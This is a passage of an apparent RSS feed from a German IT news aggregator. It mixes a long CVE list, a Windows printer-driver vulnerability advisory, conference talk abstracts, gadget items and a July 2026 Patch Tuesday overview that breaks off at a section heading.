CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320)]]></content:encoded>
</item>
<item>
<title><![CDATA[Nine Foods I’ll Never Make in the Oven Again Now That I Have an Air Fryer]]></title>
<description><![CDATA[After years of daily air frying, these nine foods are the ones that proved the appliance does more than just heat up leftovers.]]></description>
<link>https://tsecurity.de/de/3680891/it-nachrichten/nine-foods-ill-never-make-in-the-oven-again-now-that-i-have-an-air-fryer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680891/it-nachrichten/nine-foods-ill-never-make-in-the-oven-again-now-that-i-have-an-air-fryer/</guid>
<pubDate>Mon, 20 Jul 2026 12:48:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After years of daily air frying, these nine foods are the ones that proved the appliance does more than just heat up leftovers.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nine Foods I'll Never Make in the Oven Again Now That I Have an Air Fryer]]></title>
<description><![CDATA[After years of daily air frying, these nine foods are the ones that proved the appliance does more than just heat up leftovers.]]></description>
<link>https://tsecurity.de/de/3679623/it-nachrichten/nine-foods-ill-never-make-in-the-oven-again-now-that-i-have-an-air-fryer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679623/it-nachrichten/nine-foods-ill-never-make-in-the-oven-again-now-that-i-have-an-air-fryer/</guid>
<pubDate>Sun, 19 Jul 2026 16:47:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After years of daily air frying, these nine foods are the ones that proved the appliance does more than just heat up leftovers.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49166 | Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025 Printer Driver use after free]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025. Affected by this issue is some unknown functionality of the component Printer Driver. The manipulation leads to use after free.

This vulnerability is documented as CVE-2026-49166...]]></description>
<link>https://tsecurity.de/de/3678992/sicherheitsluecken/cve-2026-49166-microsoft-windows-11-24h211-25h211-26h1server-2025-printer-driver-use-after-free/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678992/sicherheitsluecken/cve-2026-49166-microsoft-windows-11-24h211-25h211-26h1server-2025-printer-driver-use-after-free/</guid>
<pubDate>Sun, 19 Jul 2026 08:38:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows 11 24H2/11 25H2/11 26H1/Server 2025</a>. Affected by this issue is some unknown functionality of the component <em>Printer Driver</em>. The manipulation leads to use after free.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-49166">CVE-2026-49166</a>. The attack needs to be performed locally. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Combi Boilers Suck, My Plumbing Pipe Dream (emf2026)]]></title>
<description><![CDATA[Get a house they said, it'll be fun they said. Well, not on a icy February morning when you step into the shower and it runs ice cold, it isn't. Modern UK plumbing is based around combi-boilers, which is the plumbing equivalent of flying a fighter jet with no ejection seat - when things go wrong,...]]></description>
<link>https://tsecurity.de/de/3678291/it-security-video/combi-boilers-suck-my-plumbing-pipe-dream-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678291/it-security-video/combi-boilers-suck-my-plumbing-pipe-dream-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 18:48:38 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Get a house they said, it'll be fun they said. Well, not on a icy February morning when you step into the shower and it runs ice cold, it isn't. Modern UK plumbing is based around combi-boilers, which is the plumbing equivalent of flying a fighter jet with no ejection seat - when things go wrong, oh boy do they go wrong. They provide a lovely standardized plumbing system in a box, greatly reducing the gubbins needed in your house; but they lack any flexibility, or backup plan.

My crazy plan is to cram into a small house: the facility to heat water conventionally (via a boiler), and via thermal solar, ...and via a solid fuel burning back boiler, ...and an electric heater. Needless to say, none of this is 'standard', so a magical system in a box won't work. This is where that February morning comes to bite, the old boiler decided to pack-up a month ahead of schedule, before any of this new stuff was ready. I can assure you, the old 1940s way of heating water with a kettle is a right royal faff.

By the end of the talk, you'll know exactly why combi boilers suck; what this vented nonsense is; what gravity has to do with anything; stuff about zones; what my secret s plan is, and why not y; and why, technically speaking (the best kind of speaking), it is illegal to remove a heatpump system in the UK if you don't like it.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/75-combi-boilers-suck-my-plumbing-pipe-dream]]></content:encoded>
</item>
<item>
<title><![CDATA[I’ve Never Used a 3D Printer Before. Is This One for Kids as Easy to Use as It Claims?]]></title>
<description><![CDATA[A thin emoji skin over a genuinely great printer.]]></description>
<link>https://tsecurity.de/de/3678182/it-nachrichten/ive-never-used-a-3d-printer-before-is-this-one-for-kids-as-easy-to-use-as-it-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678182/it-nachrichten/ive-never-used-a-3d-printer-before-is-this-one-for-kids-as-easy-to-use-as-it-claims/</guid>
<pubDate>Sat, 18 Jul 2026 17:17:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A thin emoji skin over a genuinely great printer.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Ship in a Bottle: Printing a Hermetically Sealed Sea Scooter in One Go (emf2026)]]></title>
<description><![CDATA[What happens when you combine 3D printing with the high-stakes world of marine engineering? You get a sea scooter that is born, not assembled. In this session, we explore the design and fabrication of a fully functional underwater vehicle featuring a unique constraint: a single-piece, hermeticall...]]></description>
<link>https://tsecurity.de/de/3678096/it-security-video/the-ship-in-a-bottle-printing-a-hermetically-sealed-sea-scooter-in-one-go-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678096/it-security-video/the-ship-in-a-bottle-printing-a-hermetically-sealed-sea-scooter-in-one-go-emf2026/</guid>
<pubDate>Sat, 18 Jul 2026 15:48:28 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What happens when you combine 3D printing with the high-stakes world of marine engineering? You get a sea scooter that is born, not assembled. In this session, we explore the design and fabrication of a fully functional underwater vehicle featuring a unique constraint: a single-piece, hermetically sealed hull with zero holes. No drive shafts, no charging ports, and no external switches. This talk dives into the 500-hour journey of overcoming the physics of water pressure and the logistics of &quot;mid-print assembly.&quot; We will discuss the engineering of a contactless magnetic gear drive system, the integration of inductive charging through a plastic hull, and the heart-stopping moment of dropping a fully powered drive system into a 3D printer mid-job. Most waterproof electronics rely on O-rings, gaskets, and seals—all of which are common points of failure. This project sought to eliminate those failures by creating a &quot;monolithic&quot; hull.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/54-the-ship-in-a-bottle]]></content:encoded>
</item>
<item>
<title><![CDATA['Superb for most home uses in an emergency': Jackery HomePower 3000 combines a huge 3,072Wh battery with enough power to run almost every appliance — and it's on sale right now]]></title>
<description><![CDATA[It combines a powerful 3,600W output with fast charging and solar compatibility.]]></description>
<link>https://tsecurity.de/de/3677050/it-nachrichten/superb-for-most-home-uses-in-an-emergency-jackery-homepower-3000-combines-a-huge-3072wh-battery-with-enough-power-to-run-almost-every-appliance-and-its-on-sale-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677050/it-nachrichten/superb-for-most-home-uses-in-an-emergency-jackery-homepower-3000-combines-a-huge-3072wh-battery-with-enough-power-to-run-almost-every-appliance-and-its-on-sale-right-now/</guid>
<pubDate>Fri, 17 Jul 2026 23:16:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It combines a powerful 3,600W output with fast charging and solar compatibility.]]></content:encoded>
</item>
<item>
<title><![CDATA[I replaced my space heater and ceiling fan with one Dyson appliance]]></title>
<description><![CDATA[Designed for year-round comfort, the Dyson Hot+Cool HF1 combines quiet operation and simple controls with Dyson's signature bladeless design.]]></description>
<link>https://tsecurity.de/de/3676769/it-nachrichten/i-replaced-my-space-heater-and-ceiling-fan-with-one-dyson-appliance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676769/it-nachrichten/i-replaced-my-space-heater-and-ceiling-fan-with-one-dyson-appliance/</guid>
<pubDate>Fri, 17 Jul 2026 20:02:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Designed for year-round comfort, the Dyson Hot+Cool HF1 combines quiet operation and simple controls with Dyson's signature bladeless design.]]></content:encoded>
</item>
<item>
<title><![CDATA[July’s Patch Tuesday sees an end-of-support collision amidst a massive, record-setting patch wave]]></title>
<description><![CDATA[Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in Active Directory Federation Se...]]></description>
<link>https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676568/it-nachrichten/julys-patch-tuesday-sees-an-end-of-support-collision-amidst-a-massive-record-setting-patch-wave/</guid>
<pubDate>Fri, 17 Jul 2026 18:08:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft addressed 722 CVEs this month once the 427 Chromium upstream relays are set aside — roughly three times a normal cycle and one of the largest single months in recent memory. Two vulnerabilities arrive under active exploitation: an elevation of privilege in <a href="https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview">Active Directory Federation Services</a> (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56155">CVE-2026-56155</a>), and an elevation of privilege in <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> Server (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56164">CVE-2026-56164</a>). A third, a <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) is publicly disclosed but not yet exploited.</p>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> earns Patch Now recommendations for Windows, Office, Exchange, and SQL Server. SharePoint has two critical RCEs on top of its exploited zero-day, and Exchange Server returns with a critical on-premises spoofing flaw. Adding to our (dear) administrator’s efforts, SharePoint Server 2016/2019 and SQL Server 2016 all reach end of support today. The Readiness team has provided a handy <a href="https://applicationreadiness.com/perspectives/assurance-security-dashboard-july-2026-patch-tuesday/">infographic</a> of the expected risk profile of this month’s Patch Tuesday updates.</p>



<h2 class="wp-block-heading">Known issues</h2>



<p class="wp-block-paragraph">The <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July release note</a> flags known issues against the following updates:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/">BitLocker</a> recovery prompt on first restart – the PCR7 recovery condition tracked since April remains live on the platforms that did not receive the Boot Manager servicing fix (Windows Server 2022 and Windows 10 22H2). Devices with BitLocker on the OS drive, the Group Policy “Configure TPM platform validation profile for native UEFI firmware configurations” set with PCR7 included, and <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/system-security/trusted-boot">Secure Boot</a> State PCR7 Binding reported as “Not Possible” may be prompted for the recovery key on the first restart after installing this update. This month’s publicly disclosed BitLocker security feature bypass (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50661">CVE-2026-50661</a>) keeps the component in focus.</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus">WSUS</a> synchronization error details suppressed (Windows Server 2025 and 2022) – WSUS no longer displays synchronization error details in its error reporting, a deliberate change made to address the Remote Code Execution Vulnerability <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287">CVE-2025-59287</a>. Sync still works, but administrators triaging a failed synchronization lose the detail pane and must fall back to the SoftwareDistribution logs.</li>
</ul>



<p class="wp-block-paragraph">Windows Update can still replace manually installed graphics drivers with older OEM versions from the catalogue (the four-part Hardware ID ranking issue acknowledged on the <a href="https://techcommunity.microsoft.com/blog/hardware-dev-center/updated-graphics-driver-publishing-policy-from-4-part-to-2-part-hwid--chid-targe/4519070">Hardware Dev Center</a>). The two-part HWID pilot runs to September 2026.</p>



<h2 class="wp-block-heading">Major revisions and mitigations</h2>



<p class="wp-block-paragraph">Between the June and July Patch Tuesdays, MSRC Security Update Guide notices updated 651 reported CVEs across six notification dates (15, 19, 26 June and 3, 8, 11 July), 532 of them routine Chromium upstream re-publications. Of the roughly 30 Microsoft revisions, almost all were cross-platform Office catch-up with no bearing on a Windows enterprise estate. No further action required for IT administrators for this Windows update cycle.</p>



<h2 class="wp-block-heading">Windows lifecycle and enforcement updates</h2>



<p class="wp-block-paragraph">This is the deadline cycle June pointed at. The July end-of-support wave lands today, and it collides with the month’s heaviest patching. <a href="https://learn.microsoft.com/en-us/sharepoint/getting-started">SharePoint</a> and <a href="https://learn.microsoft.com/en-us/sql/sql-server/what-is-sql-server?view=sql-server-ver17">SQL Server</a> take some of their most active security updates ever on platforms receiving their last.</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2016">SharePoint Server 2016</a> and <a href="https://learn.microsoft.com/en-us/lifecycle/products/sharepoint-server-2019">2019</a>, <a href="https://learn.microsoft.com/en-us/lifecycle/products/project-server-2016">Project Server 2016</a> and 2019, <a href="https://learn.microsoft.com/en-us/lifecycle/products/sql-server-2016">SQL Server 2016</a> and InfoPath 2013 have all reached end of support. SQL Server 2014 ESU Year 2 reaches end of support today. SharePoint 2016/2019 take an actively exploited zero-day and two RCEs this cycle, and SQL Server 2016 takes a critical RCE, all as their final security update. Now is the time to get moving on updating these platforms.</li>
</ul>



<p class="wp-block-paragraph">The 2011 Secure Boot certificate expiries have now passed; devices that never took the Windows UEFI CA 2023 key updates under <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24932">CVE-2023-24932</a> can no longer receive updated boot components, with the Windows Production PCA for the boot manager still ahead on 19 October 2026. <a href="https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview">Kerberos</a> RC4 hardening (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20833">CVE-2026-20833</a>) has been in enforcement since April 2026; the July 2026 update removes the RC4DefaultDisablementPhase rollback control that let administrators defer it, making enforcement final.</p>



<p class="wp-block-paragraph">Microsoft’s <a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-Jul">July 2026 Patch Tuesday</a> is a security-only release: 180 test-guidance entries, 14 of them high risk (June had one). Printing and graphics are the centre of gravity: win32kfull.sys, the kernel-mode window manager, is the most-patched binary (14 entries), and seven high-risk flags sit alongside it – the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components">Print Spooler</a>, four win32k entries, and two <a href="https://learn.microsoft.com/en-us/windows/win32/gdiplus/-gdiplus-gdi-start">GDI+</a> metafile entries. <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/ntfs-overview">NTFS</a> is the second theme, with 10 entries, two high risk. Every entry reports no functional changes – it’s pure regression validation. The packages span Windows 11 26H1 back to Server 2012 ESU.</p>



<h2 class="wp-block-heading">Printing and graphics (high risk)</h2>



